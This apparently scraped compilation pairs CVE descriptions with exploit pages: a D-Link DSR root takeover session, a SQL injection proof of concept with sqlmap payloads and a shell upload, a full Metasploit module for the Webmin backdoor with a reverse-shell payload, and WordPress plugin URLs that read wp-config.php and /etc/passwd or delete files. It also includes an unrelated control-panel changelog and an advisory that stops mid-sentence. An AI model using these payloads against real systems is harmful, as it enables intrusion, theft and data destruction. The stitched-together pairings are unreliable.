    nobody:x:0:0:nobody:/nonexistent:/bin/false
    admin:x:0:2:Linux User,,,:/home/admin:/bin/sh
    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
    
    #
    # Ohhh, a backdoor user! Shame on you, D-Link!!!
    # First, I tried to crack the hash. After 24hrs,
    # I dropped that and searched for another way.
    # Turns out that there are more nice functions
    # available in that CLI...  ;-)
    #
    
    D-Link DSR> system users edit 1
    users-config[userdb]> username ZX4q9Q9JUpwTZuo7
    users-config[userdb]> password newpass
    users-config[userdb]> password_confirm newpass
    users-config[userdb]> save
    
    #
    # Now, you will have overwritten the first user 
    # managed by the D-Link router software. This 
    # user is your current admin user. We have given him 
    # the username of the backdoor user and set a new 
    # password. You might want to add another admin 
    # user first and modify that.
    # For this PoC, I just use default one. Let's see
    # what /etc/passwd and /etc/shadow look like now...
    #
    
    users-config[userdb]> util cat /etc/passwd
    root:!:0:0:root:/root:/bin/sh
    ZX4q9Q9JUpwTZuo7:wq8NLLJdoSzSw:0:0:root:/:/bin/sh
    nobody:x:0:0:nobody:/nonexistent:/bin/false
    guest:x:0:1001:Linux User,,,:/home/guest:/bin/sh
    users-config[userdb]> util cat /etc/shadow
    guest:TN08ndVLhlVok:14975:0:99999:7:::
    
    #
    # So, the MD5-Crypt hash has been replaced by a 
    # DES-Crypt (unix crypt) hash...
    #
    
    users-config[userdb]> exit
    D-Link DSR> .exit
    Connection to 192.168.10.1 closed by remote host.
    Connection to 192.168.10.1 closed.
    
    #
    # Let's have a taste of the new freedom...
    #
    
    root@bt:~# ssh ZX4q9Q9JUpwTZuo7@192.168.10.1
    ZX4q9Q9JUpwTZuo7@192.168.10.1's password: 
    
    
    BusyBox v1.17.4 (2011-01-29 12:32:21 IST) built-in shell (ash)
    Enter 'help' for a list of built-in commands.
    
    DSR-250N> id
    uid=0(root) gid=0(root) groups=0(root)
    DSR-250N> uname -a
    Linux DSR-250N 2.6.31.1-cavm1 #5 Fri Sep 28 11:41:26 IST 2012 armv6l GNU/Linux
    DSR-250N> ls -la /
    drwxr-xr-x   18 root     root             0 Jan  1 00:00 .
    drwxr-xr-x   18 root     root             0 Jan  1 00:00 ..
    drwxr-xr-x    2 root     root             0 Jan  1 00:02 bin
    lrwxrwxrwx    1 root     root             5 Jan  1  1970 data -> flash
    drwxr-xr-x    5 root     root             0 Jan  1 00:02 dev
    drwxr-xr-x   12 root     root             0 Jan  1 00:08 etc
    drwxr-xr-x    4 root     root             0 Jan  1  1970 flash
    drwxr-xr-x    2 root     root             0 Jan  1  1970 flash_multiboot
    drwxr-xr-x    4 root     root             0 Jan  1 00:01 home
    lrwxrwxrwx    1 root     root            10 Sep 28  2012 init -> /sbin/init
    drwxr-xr-x    2 root     root             0 Jan  1 00:00 lib
    lrwxrwxrwx    1 root     root            12 Sep 28  2012 linuxrc -> /bin/busybox
    drwxr-xr-x    3 root     root             0 Jan  1  1970 mnt
    drwxr-xr-x    9 root     root           146 Sep 28  2012 pfrm2.0
    dr-xr-xr-x   71 root     root             0 Jan  1  1970 proc
    drwxr-xr-x    2 root     root             0 Sep 28  2012 root
    drwxr-xr-x    2 root     root             0 Jan  1 00:01 sbin
    drwxr-xr-x   11 root     root             0 Jan  1  1970 sys
    -rw-r--r--    1 root     root             5 Jan  1 00:00 temp
    drwxrwxrwt    4 root     root           380 Jan  1 00:09 tmp
    drwxr-xr-x    6 root     root             0 Jan  1  1970 usr
    drwxrwxrwt   18 root     root          1200 Jan  1 00:03 var
    DSR-250N> df -h
    Filesystem                Size      Used Available Use% Mounted on
    tmpfs                    61.2M    956.0K     60.3M   2% /tmp
    tmpfs                    61.2M    932.0K     60.3M   1% /var
    tmpfs                    61.2M         0     61.2M   0% /mnt/tmpfs
    /dev/mtdblock3           19.5M     19.5M         0 100% /pfrm2.0
    /dev/mtdblock4            2.1M    504.0K      1.6M  23% /flash
    DSR-250N> echo "r00ted! :-)"
    r00ted! :-)
    DSR-250N> exit
    Connection to 192.168.10.1 closed.
    root@bt:~# 
    
    #
    # Your web gui will not work until you reboot your box. Then, log 
    # in with the backdoor user and you will have the full admin gui back.
    #
    # By the way, how did they confine us to the CLI in the first place?
    #
    
    DSR-250N> cat /etc/profile 
    # /etc/profile
    LD_LIBRARY_PATH=.:/pfrm2.0/lib:/lib
    PATH=.:/pfrm2.0/bin:$PATH
    CLISH_PATH=/etc/clish
    export PATH LD_LIBRARY_PATH CLISH_PATH
    # redirect all users except root to CLI
    if [ "$USER" != "ZX4q9Q9JUpwTZuo7" ] ; then
    trap "/bin/login" SIGINT
    trap "" SIGTSTP
    /pfrm2.0/bin/cli
    exit
    fi
    PS1='DSR-250N> '
    DSR-250N>

CVE-2012-6614: Offensive Security’s Exploit Database Archive

PHPGurukul Hostel Management System v2.0 allows SQL injection via the id parameter in the full-profile.php file.

**Hostel Management System 2.0 - 'id' SQL Injection**

**Platform:****PHP**

**Date:****2020-01-06**

  

    # Exploit Title: Hostel Management System 2.0 - 'id' SQL Injection
    # Google Dork: intitle: "Hostel management system"
    # Date: 2020-01-03
    # Exploit Author: FULLSHADE
    # Vendor Homepage: https://phpgurukul.com
    # Software Link: https://phpgurukul.com/hostel-management-system/
    # Version: v2.0
    # Tested on: Windows
    # CVE : N/A
    
    Description:
    
    The Hostel Management System v2.0 application from PHPgurukul is vulnerable to
    SQL injection via the 'id' parameter on the full-profile.php page.
    
    ==================== 1. SQLi ====================
    
    http://10.0.0.214/Hostel%20management%20System%20Project/hostel/full-profile.php?id=1
    
    THe ?id parameter is vulnerable to SQL injection, it was also tested, and a un-authenticated
    user has the full ability to run system commands via --os-shell and fully compromise the system
    
    GET parameter 'id' is vulnerable.
    
    ---
    Parameter: id (GET)
        Type: boolean-based blind
        Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
        Payload: id=-3444' OR 1650=1650#
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: id=1' OR (SELECT 3801 FROM(SELECT COUNT(*),CONCAT(0x7176627a71,(SELECT (ELT(3801=3801,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- klCZ
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 OR time-based blind
        Payload: id=1' OR SLEEP(5)-- slKU
    
        Type: UNION query
        Title: MySQL UNION query (NULL) - 29 columns
        Payload: id=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176627a71,0x63786c795a416371494752765744487a4e6443636e705076586e714d735a7053595a4b676b526157,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
    
    [14:20:08] [INFO] the file stager has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpulczr.php
    [14:20:08] [INFO] the backdoor has been successfully uploaded on 'C:/xampp/htdocs/' - http://10.0.0.214:80/tmpbjdvm.php
    [14:20:08] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER
    os-shell> whoami
    do you want to retrieve the command standard output? [Y/n/a] y
    command standard output: 'john-pc\john'
    os-shell>

CVE-2020-5510: OffSec’s Exploit Database Archive

An issue was discovered in Webmin <=1.920. The parameter old in password_change.cgi contains a command injection vulnerability.

**Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)**

**Platform:****Linux**

**Date:****2019-08-12**

  

    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking
    
      include Msf::Exploit::Remote::HttpClient
    
      def initialize(info = {})
        super(update_info(info,
          'Name'           => 'Webmin 1.920 Unauthenticated RCE',
          'Description'        => %q{
            This module exploits a backdoor in Webmin versions 1.890 through 1.920.
            Only the SourceForge downloads were backdoored, but they are listed as
            official downloads on the project's site.
    
            Unknown attacker(s) inserted Perl qx statements into the build server's
            source code on two separate occasions: once in April 2018, introducing
            the backdoor in the 1.890 release, and in July 2018, reintroducing the
            backdoor in releases 1.900 through 1.920.
    
            Only version 1.890 is exploitable in the default install. Later affected
            versions require the expired password changing feature to be enabled.
          },
          'Author'         => [
            'AkkuS <Özkan Mustafa Akkuş>' # Discovery & PoC & Metasploit module @ehakkus
          ],
          'License'        => MSF_LICENSE,
          'References'     =>
            [
              ['CVE', '2019-'],
              ['URL', 'https://www.pentest.com.tr']
            ],
          'Privileged'     => true,
          'Payload'        =>
            {
              'DisableNops' => true,
              'Space'       => 512,
              'Compat'      =>
                {
                  'PayloadType' => 'cmd'
                }
            },
          'DefaultOptions' =>
            {
              'RPORT' => 10000,
              'SSL'   => false,
              'PAYLOAD' => 'cmd/unix/reverse_python'
            },
          'Platform'       => 'unix',
          'Arch'           => ARCH_CMD,
          'Targets'        => [['Webmin <= 1.910', {}]],
          'DisclosureDate' => 'May 16 2019',
          'DefaultTarget'  => 0)
        )
        register_options [
            OptString.new('TARGETURI',  [true, 'Base path for Webmin application', '/'])
        ]
      end
    
      def peer
        "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}"
      end
      ##
      # Target and input verification
      ##
      def check
        # check passwd change priv
        res = send_request_cgi({
          'uri'     => normalize_uri(target_uri.path, "password_change.cgi"),
          'headers' =>
            {
              'Referer' => "#{peer}/session_login.cgi"
            },
          'cookie'  => "redirect=1; testing=1; sid=x; sessiontest=1"
        })
    
        if res && res.code == 200 && res.body =~ /Failed/
          res = send_request_cgi(
            {
            'method' => 'POST',
            'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
            'ctype'  => 'application/x-www-form-urlencoded',
            'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
            'headers' =>
              {
                'Referer' => "#{peer}/session_login.cgi"
              },
            'data' => "user=root&pam=&expired=2&old=AkkuS%7cdir%20&new1=akkuss&new2=akkuss"        
            })
    
          if res && res.code == 200 && res.body =~ /password_change.cgi/
            return CheckCode::Vulnerable
          else
            return CheckCode::Safe
          end
        else
          return CheckCode::Safe
        end
      end
    
      ##
      # Exploiting phase
      ##
      def exploit
    
        unless Exploit::CheckCode::Vulnerable == check
          fail_with(Failure::NotVulnerable, 'Target is not vulnerable.')
        end
    
        command = payload.encoded
        print_status("Attempting to execute the payload...")
        handler
        res = send_request_cgi(
          {
          'method' => 'POST',
          'cookie' => "redirect=1; testing=1; sid=x; sessiontest=1",
          'ctype'  => 'application/x-www-form-urlencoded',
          'uri' => normalize_uri(target_uri.path, 'password_change.cgi'),
          'headers' =>
            {
              'Referer' => "#{peer}/session_login.cgi"
            },
          'data' => "user=root&pam=&expired=2&old=AkkuS%7c#{command}%20&new1=akkuss&new2=akkuss"
          })
    
      end
    end

CVE-2019-15107: Offensive Security’s Exploit Database Archive

In CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.840, File and Directory Information Exposure in filemanager allows attackers to enumerate users and check for active users of the application by reading /tmp/login.log.

**New Version (coming soon)**  
_Now in 2019, we release new version multiple times a week and sometimes even multiple times per day._

**Version 0.9.8.651 – 0.9.8.747 (released 21/05/2018-09/12/2018 )**

Security  
– **\[New Feature\]** Implementation of anti XSS token for the GUI

New WebServers  
– **\[New Feature\]** Define per domain webservers, now you can use different webservers per domain  
– **\[New Feature\]** prepared for AI-Robot so Artificial Intelligence can take over the control on it  
– **\[New Feature\]** Define global default server vhost templates for apache/nginx/varnish/php-fpm  
– **\[New Feature\]** Define per domain vhost templates for apache/nginx/varnish/php-fpm  
– **\[New Feature\]** Error detection in vhost build for apache/nginx/varnish/php-fpm  
– **\[UPDATE\]** latest versions of the webservers apache/nginx/varnish  
– **\[UPDATE\]** AutoSSL: more stable domain validation check

New Varnish  
– **\[New Feature\]** Varnish makes your site look like static html, it doesn’t need to run php-cgi/php-fpm for each request.  
– **\[New Feature\]** Website continues to work as cached even if apache is down  
– **\[New Feature\]** more advanced templates with better cache in memory  
– **\[New Feature\]** per domain templates and configs which you can modify and build your own  
– **\[New Feature\]** it can run now as a cache server in front of Tomcat,nodejs,ruby…

AI-Robot (Artificial Intelligence for cwp)  
Artificial intelligence integration, we have integrated “AI-Robot” artificial intelligence system which has started to learn system issues and soon it will be able to handle errors and automatically recover the system services.

PHP/PHP-FPM  
– **\[New Feature\]** PHP-FPM default setup with cache and with fastest unix sockets  
– **\[New Feature\]** PHP Pecl Manager for all PHP builders  
– **\[New Feature\]** PHP-FPM Selector with many custom options (automatic install of dependencies)  
– **\[New Feature\]** Predefined vhost templates for better performances  
– **\[New Feature\]** Custom templates for php-fpm, you can use custom per domain  
– **\[UPDATE\]** latest versions of the PHP  
– **\[UPDATE\]** New PHP 7.3.0, please use only for beta testing  
– **\[UPDATE\]** for all php builders automatic detection if build is already running  
– **\[UPDATE\]** PHP Selector with many versions and options (automatic install of dependencies)

Other Modules  
– **\[New Feature\]** New DNS Zone Editor with error detection and now much more advanced  
– **\[New Feature\]** New Mod Security Manager  
– **\[New Feature\]** Automatic update manager for 3rdParty scripts like, roundcube, phpmyadmin…  
– **\[New Feature\]** User notifications  
– **\[UPDATE\]** Improved cwp to cwp migration tool, we are still working on it to make it even better  
– **\[UPDATE\]** MySQL Manager: edit user password

**User Panel \[New Design\]**  
– **\[SECURITY\]** Implementation of anti XSS token for the GUI  
– **\[New Feature\]** New Advanced File Manager  
– **\[New Feature\]** New Modern Design  
– **\[New Feature\]** Search integration for menu and icons  
– **\[New Feature\]** Sound alerts  
– **\[New Feature\]** Pagination for all modules  
– **\[New Feature\]** Advanced editor integration for php.ini  
– **\[UPDATE\]** Cron Manager error detection  
\* We have also fixed many other reported bugs

**Version 0.9.8.448 – 0.9.8.651 (released 08/02/2018-21/05/2018)**  
– **\[New Feature\]** cgroups for centos 7 (limit resource per user, eg. set cpu limit to 50%)  
– **\[New Feature\]** Main left menu search option  
– **\[New Feature\]** Manage User crons from the admin panel  
– **\[New Feature\]** New Notifications handler with email alerts  
– **\[New Feature\]** New Ulimits Module -Show all user processes and limits (good for debugging)  
– **\[New Feature\]** Monit Monitoring (advanced tool for monitoring server services and resources)  
– **\[New Feature\]** MySQL Manager now has security and optimization tests integrated  
– **\[New Feature\]** Security Tools – Maldet Scan – Scan websites for malware  
– **\[New Feature\]** Security Tools – RKHunter Scan – Scan server for rootkits, backdoors  
– **\[New Feature\]** Security Tools – Lynis Scan – Scan server for system hardening  
– **\[New Feature\]** Security Tools – Symlink scan – Scan user accounts for symlinks  
– **\[UPDATE\]** New SSL Manager with additional auto-download for chain certificates  
– **\[UPDATE\]** Latest PHP versions (used in switcher/selector)  
– **\[UPDATE\]** Apache latest version rpm + rebuilder/compiler  
– **\[UPDATE\]** New Security checks in the Security Advisor via new notifications  
– **\[BUGFIX\]** Fixed all reported bugs with the cpanel account migration  
– **\[BUGFIX\]** Fixed bugs in the account transfer tool  
– **\[BUGFIX\]** Fixed bugs in the Mail server manager related to rebuild  
– **\[BUGFIX\]** Fixed bugs with API

**User Panel \[\]**  
– **\[SECURITY\]** Big security update for user panel, many issues have been resolved  
– **\[New Feature\]** AutoSSL- Install/remove Free SSL from the user panel  
– **\[UPDATE\]** Improved DNS zone editor

\* We have also fixed many other reported bugs

**Version 0.9.8.359 – 0.9.8.448** (released 29/09/2017-07/02/2018)  
– **\[UPDATE\]** PHP 7.2  
– **\[UPDATE\]** New admin panel design upgrade  
– **\[New Feature\]** Theme manager for User Panel  
– **\[New Feature\]** Language manager for User Panel  
– **\[New Feature\]** New cPanel migration tool running in background  
– **\[New Feature\]** New CWP to CWP migration tool  
– **\[New Feature\]** New Advanced Backup Manager  
– **\[New Feature\]** New Advanced API Manager with permissions

**New user Panel** (demo)  
– **\[New Feature\]** All new, too many things to have them listed here, you simply need to check it!  
Fixed many many other reported bugs

**Version 0.9.8.334 – 0.9.8.359** (released 26/06-29/09/2017)  
– **\[UPDATE\]** Added Apache 2.4.26, 2.4.27  
– **\[UPDATE\]** PHP 5.6.31, 7.0.21, 7.0.22, 7.0.23, 7.0.24, 7.1.6, 7.1.7, 7.1.9, 7.1.10  
– **\[UPDATE\]** PHP selector delete unwanted php version with single click  
– **\[UPDATE\]** AutoSSL: manualy start and force auto renewal  
– **\[New Feature\]** Included manager for new user panel compatibility

– **\[BUGFIX\]** IonCube installer fixed issue with php 7.0 & 7.1  
– **\[BUGFIX\]** Zendguard loader5.5, 5.6 improved installer  
– **\[BUGFIX\]** AutoSSL reported bugs fixed  
– **\[BUGFIX\]** Improved security  
Fixed many other reported bugs

**Version 0.9.8.315 – 0.9.8.333** (released 28/04-25/06/2017)  
– **\[UPDATE\]** detailed cleanup of removed accounts  
– **\[UPDATE\]** yum manager improvement  
– **\[UPDATE\]** New PHP versions added 7.0.20 and 7.1.5  
– **\[UPDATE\]** php selector new versions of php  
– **\[UPDATE\]** apache 2.4.26 (has security updates)  
– **\[New Feature\]** new ftp manager for admin  
– **\[New Feature\]** bandwidth monitor (incoming/outgoing for all interfaces)

– **\[BUGFIX\]** php switcher bug fix  
– **\[BUGFIX\]** autossl bugfix  
– **\[BUGFIX\]** mod security installer bug fix  
– **\[BUGFIX\]** vhost rebuild bug fix  
– **\[BUGFIX\]** mail queue module bug fix  
– **\[BUGFIX\]** mail explorer module bug fix  
Fixed many other reported bugs

**Version 0.9.8.291 – 0.9.8.314** (released 23/03-28/04/2017)  
– **\[UPDATE\]** New PHP versions added 7.0.18 and 7.1.4  
– **\[UPDATE\]** Improved SSL Manager (fixed autoSSL bugs)  
– **\[UPDATE\]** Improved backups (now weekly and monthly use hard links and can reduce total backup size up to 65%)  
– **\[New Feature\]** Ajax disk usage checker (check your disk space usage per folder)  
– **\[New Feature\]** New Varnish configuration editor  
– **\[New CWPpro\]** Yum Package and Repository Manager  
– **\[SECURITY\]** SECURITY BUG FIXED  
Prevention of Cross-site Scripting (XSS) Attack ​by Esmaeil Rahimian (Security Research from SecureHost) Rahimian@securehost.co  
Fixed many other reported bugs

**Version 0.9.8.266 – 0.9.8.290** (released 01-22/03/2017)  
– **\[BUGFIX\]** ioncube update scripts  
– **\[BUGFIX\]** sysstat graph errors  
– **\[BUGFIX\]** PHP Selector fixed php 7  
– **\[BUGFIX\]** Advanced File Manager bugs  
– **\[BUGFIX\]** Mail Server rebuild  
– **\[BUGFIX\]** SSL redirection for cwp services  
– **\[BUGFIX\]** Fixed security advisor multiple messages  
– **\[UPDATE\]** Php Switcher new additional modules and new php versions  
– **\[UPDATE\]** PHP Selector update of all php versions and added php 7.0, 7.1  
– **\[UPDATE\]** SSL Cert Manager now with more detailed info from the certificate files  
– **\[New Feature\]** AutoSSL option when creating new account, domain or subdomain from admin panel  
– **\[New Feature\]** AutoSSL for Hostname  
– **\[New Feature\]** Nice and Fast Ajax upgrade for list accounts, domains and subdomains.  
– **\[New Feature\]** New Varnish configuration editor  
– **\[CWPpro\]** Yum, number of available packages upgrades at login into cwp

**Version 0.9.8.250 – 0.9.8.265** (released 21-28/02/2017)  
– **\[New Feature\]** Sysstat graphs  
– **\[UPDATE\]** Higher grade for apache SSL  
– **\[UPDATE\]** PHP Switcher\_v2 Configuration Upgrade and Bugs Fixed  
– **\[BUGFIX\]** File Manager bug fixed, and few smaller bug in the gui

**Version 0.9.8.248 – 0.9.8.249** (released 21/02/2017)  
– **\[UPDATE\]** PHP Switcher added extensions: intl, pspell, tidy, wddx  
– **\[BUGFIX\]** Fixed several bugs

**Version 0.9.8.240 – 0.9.8.247** (released 17/02/2017)  
– **\[New Feature\]** NEW friendly PHP Version Switcher with many addons and more to come…  
– **\[UPDATE\]** Update of PHP versions: 7.1.2, 7.0.16, 5.6.30  
– **\[Old Removed\]** Old PHP Version Switcher removed from the left menu but still exists.  
– **\[BUGFIX\]** Fixed several bugs

**Version 0.9.8.239** (released 13/02/2017)  
– **\[BUGFIX\]** Fixed bug with softaculous remove mysql user.

**Version 0.9.8.237 & 0.9.8.238** (released 11/02/2017)  
– **\[New Feature\]** LiteSpeed Enterprise integration with CWP

**13/02/2017**  
…we were working very hard to make CWP work with CentOS 7 so we have done many changes are unfortunately there is no any info what was done before in which version.

CVE-2019-13385: ChangeLog for CentOS 7 | Control Web Panel

An Arbitrary File Deletion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to delete arbitrary files via the $REQUEST['adaptive-images-settings'] parameter in adaptive-images-script.php.

**LFI (Local file inclusion), Arbitrary file deletion and RCE in Adaptive Images for WordPress plugin.**

This plugin, developed by Nevma is used to serve images in Wordpress based on device resolution, allowing an on-the-fly resize. It is useful to decrease the page load for mobile devices.

The analyzed version is **0.6.66** on a fresh WordPress installation 5.2.2.

Due to an exposed variable an unauthenticated attacker can exploit a vulnerability that can lead to a LFI (Local File Inclusion) and to Arbitrary File Deletion.

Sensible system and Wordpress file can be easily exfiltrated and the two vulnerabilities can be used to obtain RCE (Remote Command Execution).

****INTRO****

**Adaptive Images for WordPress** serves images through a PHP script, adaptive-images-script.php.

All requests made to image assets that appear in specific folders (the plugin settings allow to change these folders) are redirected through this script that eventually manipulate the image before serving it.

At **line 877** the plugin settings are collected:

      $settings = adaptive_images_script_get_settings();
    

This method at **line 62** checks if the $_REQUEST['adaptive-images-settings'] is present and if not it overrides and composes it according the default configuration.

    
        function adaptive_images_script_get_settings () {
    
            // Setup script settings.
    
            if ( ! isset( $_REQUEST['adaptive-images-settings'] ) ) {
    
        ...
    
        // Setup script settings and save the in request scope.
    
        $_REQUEST['adaptive-images-settings'] = array(
            'debug'          => $debug,
            'resolutions'    => $resolutions,
            'cache_dir'      => $cache_dir,
            'jpg_quality'    => $jpg_quality,
            'png8'           => $png8,
            'sharpen'        => $sharpen,
            'watch_cache'    => $watch_cache,
            'browser_cache'  => $browser_cache,
            'request_uri'    => $request_uri,
            'source_file'    => $source_file,
            'wp_content'     => $wp_content_dir,
            'client_width'   => $client_width,
            'hidpi'          => $hidpi,
            'pixel_density'  => $pixel_density,
            'resolution'     => $resolution
        );
    

At the end of the method the function simply return the $_REQUEST['adaptive-images-settings'] variable.

      return $_REQUEST['adaptive-images-settings'];
    

This logic allows any visitor to set and override the $_REQUEST['adaptive-images-settings'] just passing it to the request.

**Having control on this variable allows an attacker to exploit two major vulnerabilities.**

The parameter $_REQUEST['adaptive-images-settings']['source_file'] allows an attacker to set in an arbitrary way the file requested that will be served from the script.

Even if it is not possible to manipulate the Content-Type header, the script will generate a malformed image that contains the requested file.

This vulnerability in combination with other server misconfiguration can lead to RCE (Remote Command Execution) using log poisoning technique, /proc/self/environ technique and others.

****POC****

http://wp-vulnerable/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=../../../wp-config.php

http://wp-vulnerable/wp-content/uploads/2019/05/image.jpg?adaptive-images-settings[source_file]=/etc/passwd

_The image used to trigger the vulnerability should exist._

****Arbitrary File Deletion****

The plugin contains a cache mechanism that allows the generated resized images to be saved and cached to prevent excessive resources usage.

As every cache mechanism a file should be deleted if the source is newer than the cache file.  
**This feature can be abused to delete an arbitrary file accessible from the Wordpress installation.**

On **line 977** is called the function that removes a stale cache image:

        // Locate cached image.
    
        $cache_file = $settings['wp_content'] . '/' . $settings['cache_dir'] . '/' . $settings['resolution'] . $settings['request_uri'];
    
    
    
        // Check if cached image if stale and relete it if so.
    
        if ( file_exists( $cache_file ) ) {
    
            // Check if cached image is stale and delete it if so.
    
            if ( $settings['watch_cache'] ) {
    
                adaptive_images_delete_stale_cache_image( $settings['source_file'], $cache_file, $settings['resolution'] );
    
            }
    
        }
    

Every variable used in this code is controlled by the aforementioned $_REQUEST['adaptive-images-settings'] variable.

The adaptive_images_delete_stale_cache_image function just checks if the $cache_files exists and if it is newer than the original one.

The only condition to successfully exploit this vulnerability is that the file that we pass as $source_file is newer than the file that we pass as $cache_file.

        function adaptive_images_delete_stale_cache_image ( $source_file, $cache_file, $resolution ) {
    
            if ( file_exists( $cache_file ) ) {
    
                // Check image file timestamp.
    
                if ( filemtime( $cache_file ) >= filemtime( $source_file ) ) {
    
                    return $cache_file;
    
                }
    
                unlink( $cache_file );
            }
    
        }
    

****POC****

Using relative paths we set as $source_file an image (or any other file) that exists in the website and as $cache_file (our target) the wp-config.php.  
In this way it is almost certain that the image is more recent than the target file.

Some other variables should be manipulated to pass some checks and build the correct path of the target file.

_This POC deletes the wp-config.php, test it carefully._

http://wp-vulnerable/wp-content/uploads/2019/07/image.jpeg?adaptive-images-settings[source_file]=../../../wp-content/uploads/2019/07/image.jpeg&adaptive-images-settings[resolution]=&resolution=16000&adaptive-images-settings[wp_content]=.&adaptive-images-settings[cache_dir]=../../..&adaptive-images-settings[request_uri]=wp-config.php&adaptive-images-settings[watch_cache]=1

****BONUS: LFI + Arbitrary file deletion = RCE****

Combining the previous two vulnerabilities an attacker can obtain a bold (and not really stealth) Remote Code Execution on the server.

This is the exploit process:

1.  Dump the current wp-config.php
2.  Delete the current wp-config.php
3.  Install a fake WordPress alongside the real one (DB credentials are known, a random db\_prefix should be chosen to not overwrite the current installation).
4.  Log in the fake WordPress to patch a plugin or theme file to set up a backdoor
5.  Use the backdoor to restore the previous wp-config.php and remove the fake WordPress installation from the database.

This process can be automated and executed in less than 1 minute. During the process the website will not be reachable (exploit).

****Time Line****

Date

What

2019/07/08

Vulnerability reported to plugin developer company using the email found in code. No response.

2019/07/11

Vulnerability reported directly to plugin developer.

2019/07/11

The vulnerability was verified by the plugin developer.

2019/07/11

A fix was released in version 0.6.7.

2019/07/19

Public disclosure.

Special thanks to Takis @ Nevma for his availability and for the quick release of the fix.

CVE-2019-14206: Adaptive images for Wordpress 0.6.66: LFI, arbitrary file deletion and RCE.

A command injection vulnerability is present in Aruba Instant that permits an authenticated administrative user to execute arbitrary commands on the underlying operating system. A malicious administrator could use this ability to install backdoors or change system configuration in a way that would not be logged. Workaround: None. Resolution: Fixed in Aruba Instant 4.2.4.12, 6.5.4.11, 8.3.0.6, and 8.4.0.0

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Aruba Product Security Advisory =============================== Advisory ID: ARUBA-PSA-2019-001 CVE: CVE-2018-7064, CVE-2018-7082, CVE-2018-7083, CVE-2018-7084, CVE-2018-16417 Publication Date: 2019-Feb-27 Status: Confirmed Revision: 1 Title ===== Aruba Instant Multiple Vulnerabilities Overview ======== Aruba has released updates to Aruba Instant (IAP) that address multiple serious vulnerabilities. The most significant vulnerability is rated CRITICAL with a CVSS score of 9.8. Affected Products ================= - Aruba Instant 4.x prior to 6.4.4.8-4.2.4.12 - Aruba Instant 6.5.x prior to 6.5.4.11 - Aruba Instant 8.3.x prior to 8.3.0.6 - Aruba Instant 8.4.x prior to 8.4.0.1 Details ======= Unauthenticated command execution (CVE-2018-7084) ------------------------------------------------- A command injection vulnerability is present that permits an unauthenticated user with access to the Aruba Instant web interface to execute arbitrary system commands within the underlying operating system. An attacker could use this ability to copy files, read configuration, write files, delete files, or reboot the device. Internal reference: 182945 Severity: CRITICAL CVSSv3 Overall Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H Workaround: Block access to the Aruba Instant web interface from all untrusted users. Discovery: This vulnerability was discovered and reported by Nick Starke of Aruba Threat Labs. Resolution: Fixed in Aruba Instant 4.2.4.12, 6.5.4.11, 8.3.0.6, and 8.4.0.1 Unauthenticated information disclosure (CVE-2018-16417) ------------------------------------------------------- A vulnerability is present which allows an unauthenticated user to retrieve recently cached configuration commands. By sending a crafted URL to the Aruba Instant web interface, an attacker can view configuration commands that have been recently issued by an administrator. This information could include sensitive parameters such as keys or passwords. Internal reference: 187251 Severity: HIGH CVSSv3 Overall Score: 7.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Workaround: Block access to the Aruba Instant web interface from all untrusted users. Discovery: This vulnerability was discovered and reported by Mina Mohsen Edwar from Verizon. Resolution: Fixed in Aruba Instant 4.2.4.12, 6.5.4.11, 8.3.0.6, and 8.4.0.0 Core dumps are publicly accessible (CVE-2018-7083) -------------------------------------------------- If a process running within Aruba Instant crashes, it may leave behind a "core dump", which contains the memory contents of the process at the time it crashed. It was discovered that core dumps are stored in a way that unauthenticated users can access them through the Aruba Instant web interface. Core dumps could contain sensitive information such as keys and passwords. Internal reference: 182949 Severity: HIGH CVSSv3 Overall Score: 7.5 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N Workaround: Block access to the Aruba Instant web interface from all untrusted users. Discovery: This vulnerability was discovered and reported by Nick Starke of Aruba Threat Labs. It was also independently discovered and reported by Mina Mohsen Edwar from Verizon. Resolution: Fixed in Aruba Instant 4.2.4.12, 6.5.4.11, 8.3.0.6, and 8.4.0.0 Authenticated command injection (CVE-2018-7082) ----------------------------------------------- A command injection vulnerability is present in Aruba Instant that permits an authenticated administrative user to execute arbitrary commands on the underlying operating system. A malicious administrator could use this ability to install backdoors or change system configuration in a way that would not be logged. Internal reference: 182947 Severity: HIGH CVSSv3 Overall Score: 7.2 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Workaround: None Discovery: This vulnerability was discovered and reported by Nick Starke of Aruba Threat Labs. Resolution: Fixed in Aruba Instant 4.2.4.12, 6.5.4.11, 8.3.0.6, and 8.4.0.0 Reflected Cross-Site Scripting (CVE-2018-7064) ---------------------------------------------- A reflected cross-site scripting (XSS) vulnerability is present in an unauthenticated Aruba Instant web interface. An attacker could use this vulnerability to trick an IAP administrator into clicking a link which could then take administrative actions on the Instant cluster, or expose the session cookie for an administrative session. Internal reference: 176775 Severity: 